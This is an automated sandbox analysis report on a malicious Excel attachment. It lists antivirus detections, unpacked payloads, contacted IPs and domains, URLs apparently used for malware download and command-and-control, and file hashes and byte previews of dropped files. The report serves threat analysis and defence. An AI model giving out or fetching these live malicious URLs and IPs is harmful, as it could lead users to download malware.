              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe21%VirustotalBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe23%ReversingLabsWin32.Backdoor.Androm

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.0.xmtxpy.exe.400000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.2.xmtxpy.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.xmtxpy.exe.130000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              6.0.xmtxpy.exe.400000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://198.46.132.195/windowSSH/.win32.exe8%VirustotalBrowse
              http://198.46.132.195/windowSSH/.win32.exe100%Avira URL Cloudmalware
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://asiaoil.bar//bobby/five/fre.php1%VirustotalBrowse
              http://asiaoil.bar//bobby/five/fre.php100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              asiaoil.bar
              		172.67.197.66
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.46.132.195/windowSSH/.win32.exetrue
                • 8%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                		unknown
                http://asiaoil.bar//bobby/five/fre.phptrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drfalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drfalse
                    		high
                    http://www.ibsensoftware.com/xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    198.46.132.195
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue
                    104.21.49.244
                    		unknownUnited States
                    		13335CLOUDFLARENETUStrue
                    172.67.197.66
                    		asiaoil.barUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:569962
                    Start date:10.02.2022
                    Start time:10:20:40
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 72.4% (good quality ratio 69.6%)
                    • Quality average: 78.5%
                    • Quality standard deviation: 27.9%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 77
                    • Number of non-executed functions: 56
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:21:38API Interceptor50x Sleep call for process: EQNEDT32.EXE modified
                    10:21:47API Interceptor771x Sleep call for process: xmtxpy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    198.46.132.195_OCEANA_2201S_BUSAN_HOCHIMINH_.xlsxGet hashmaliciousBrowse
                    • 198.46.132.195/mscloud/.win32.exe
                    VSL_LNGA01022_ATHENA_HHI 3112_.xlsxGet hashmaliciousBrowse
                    • 198.46.132.195/win-explorer10/.win32.exe
                    SOA Dec 2021.xlsxGet hashmaliciousBrowse
                    • 198.46.132.195/win_explorer/.win32.exe
                    _Purchase Order Docs_.xlsxGet hashmaliciousBrowse
                    • 198.46.132.195/Registry/.win32.exe
                    _Purchase Order_00523_.xlsxGet hashmaliciousBrowse
                    • 198.46.132.195/googleCRC/.win32.exe
                    104.21.49.244RhACfIARBK.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    5XDl9pDBBW.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsxGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    tVAecH1aRM.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    172.67.197.66RhACfIARBK.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    5XDl9pDBBW.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsxGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php
                    tVAecH1aRM.exeGet hashmaliciousBrowse
                    • asiaoil.bar//bobby/five/fre.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    asiaoil.barRhACfIARBK.exeGet hashmaliciousBrowse
                    • 104.21.49.244
                    5XDl9pDBBW.exeGet hashmaliciousBrowse
                    • 104.21.49.244
                    _OCEANA_2201S_BUSAN_HOCHIMINH_.xlsxGet hashmaliciousBrowse
                    • 172.67.197.66
                    tVAecH1aRM.exeGet hashmaliciousBrowse
                    • 172.67.197.66

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    AS-COLOCROSSINGUSt 904428. customs INV .xlsxGet hashmaliciousBrowse
                    • 198.23.213.37
                    Quotation bgp offsore.xlsxGet hashmaliciousBrowse
                    • 198.12.107.201
                    PO7313 2022-02.xlsxGet hashmaliciousBrowse
                    • 107.174.138.160
                    CI + BL + PL.xlsxGet hashmaliciousBrowse
                    • 107.173.219.30
                    1056521.xlsxGet hashmaliciousBrowse
                    • 198.12.107.201
                    MV RICH SEAWAY.xlsxGet hashmaliciousBrowse
                    • 107.173.219.30
                    Document_Set_2022-02-09-29T113953.xlsxGet hashmaliciousBrowse
                    • 192.210.218.110
                    Jikte.exeGet hashmaliciousBrowse
                    • 23.94.150.194
                    d0c0341.xlsxGet hashmaliciousBrowse
                    • 198.12.107.201
                    Purchase Order BE2101008.xlsxGet hashmaliciousBrowse
                    • 192.210.218.119
                    e5n28c53_Receipt.exeGet hashmaliciousBrowse
                    • 23.94.150.194
                    q8D3fUmk6n.docxGet hashmaliciousBrowse
                    • 192.210.218.110
                    SKTB-QUAI-HDG INV15091396.pdf.HtMl..HtmGet hashmaliciousBrowse
                    • 198.46.132.200
                    shippingXdocumenstX904428.XcustomsXINV.xlsxGet hashmaliciousBrowse
                    • 198.23.213.37
                    HnohSi3EBOGet hashmaliciousBrowse
                    • 107.173.255.198
                    9gMto0wEJ0Get hashmaliciousBrowse
                    • 107.173.255.198
                    OYN8S8kFfpGet hashmaliciousBrowse
                    • 107.173.255.198
                    vGmdfkESAsGet hashmaliciousBrowse
                    • 107.173.255.198
                    UpMSLoJzX6Get hashmaliciousBrowse
                    • 107.173.255.198
                    TlLTxk8hTHGet hashmaliciousBrowse
                    • 107.173.255.198
                    CLOUDFLARENETUSchromeparaespana.apkGet hashmaliciousBrowse
                    • 104.16.88.20
                    27099788_20220118152009.docxGet hashmaliciousBrowse
                    • 172.67.162.130
                    Superflex PO22000331.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    Price Offer.ppamGet hashmaliciousBrowse
                    • 104.16.202.237
                    Quotation bgp offsore.xlsxGet hashmaliciousBrowse
                    • 172.67.200.123
                    Proforma Fatura Siparisi.exeGet hashmaliciousBrowse
                    • 162.159.134.233
                    RhACfIARBK.exeGet hashmaliciousBrowse
                    • 172.67.197.66
                    2kkethlyxG.exeGet hashmaliciousBrowse
                    • 172.67.201.63
                    Ordine di acquisto -AR95647,pdf.exeGet hashmaliciousBrowse
                    • 162.159.130.233
                    BgrSGvSM0A.exeGet hashmaliciousBrowse
                    • 104.21.12.125
                    BqorSCqeu8.exeGet hashmaliciousBrowse
                    • 172.67.148.117
                    jWIGwuzTuw.exeGet hashmaliciousBrowse
                    • 172.67.144.157
                    a0KvC4lzXF.exeGet hashmaliciousBrowse
                    • 172.67.172.91
                    Order #3200025006.exeGet hashmaliciousBrowse
                    • 66.235.200.145
                    Credit_Dtails_Ref7823496.exeGet hashmaliciousBrowse
                    • 172.67.129.116
                    New year order-01069022^^^PDF.exeGet hashmaliciousBrowse
                    • 172.67.200.96
                    Bank Payment Trace 626254.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    New Order for antigen rapid test kit.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    P-022022RG.ppamGet hashmaliciousBrowse
                    • 104.16.203.237
                    CopyXSwiftXTT.ppamGet hashmaliciousBrowse
                    • 104.16.203.237

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)RhACfIARBK.exeGet hashmaliciousBrowse
                      C:\Users\user\AppData\Local\Temp\xmtxpy.exeRhACfIARBK.exeGet hashmaliciousBrowse

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

                        Download File
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Category:downloaded
                        Size (bytes):295124
                        Entropy (8bit):7.944502610174892
                        Encrypted:false
                        SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                        MD5:7DF1896047D9647D818080DD17563D92
                        SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                        SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                        SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: Virustotal, Detection: 21%, Browse
                        • Antivirus: ReversingLabs, Detection: 23%
                        Reputation:low
                        IE Cache URL:http://198.46.132.195/windowSSH/.win32.exe
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1582FF20.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):3747
                        Entropy (8bit):7.932023348968795
                        Encrypted:false
                        SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                        MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                        SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                        SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                        SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E8BE616.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):3747
                        Entropy (8bit):7.932023348968795
                        Encrypted:false
                        SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                        MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                        SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                        SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                        SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emf

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):1099960
                        Entropy (8bit):2.015315240232208
                        Encrypted:false
                        SSDEEP:3072:gXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:OahIFdyiaT2qtXl
                        MD5:15A27F5C7EF8F89145A89ECF451B90D4
                        SHA1:EC1F1BCB1324FDBB9FAE80EF1003B57D727100F4
                        SHA-256:637B6C47252552D5DBD483BDD47DE9BCB5B041AB0EECBF523FDC0145D8154213
                        SHA-512:78BBBD3DBB637F7BEE3724CEADAFFD362567A951EF9374F1E8398B9C37E0C7A1ECB74BAB56B9B331AC0F524E8E97658BC0625238F2EF383F51420FBFC8EABD22
                        Malicious:false
                        Reputation:low
                        Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................W$...x.O..f.W.@..%...T.O...O.......O.|.O.RQ.X..O...O.....d.O...O.$Q.X..O...O. ...Id.W..O...O. .........O..d.W............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............O.X.....O.(.O..8.W......O.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\611F4629.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):10202
                        Entropy (8bit):7.870143202588524
                        Encrypted:false
                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                        Malicious:false
                        Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62ED731F.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                        Category:dropped
                        Size (bytes):2647
                        Entropy (8bit):7.8900124483490135
                        Encrypted:false
                        SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                        MD5:E46357D82EBC866EEBDA98FA8F94B385
                        SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                        SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                        SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                        Malicious:false
                        Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\902EBCC8.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92A0FADB.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):10202
                        Entropy (8bit):7.870143202588524
                        Encrypted:false
                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                        Malicious:false
                        Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C018985.png

                        Download File
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):5396
                        Entropy (8bit):7.915293088075047
                        Encrypted:false
                        SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                        MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                        SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                        SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                        SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                        Malicious:false
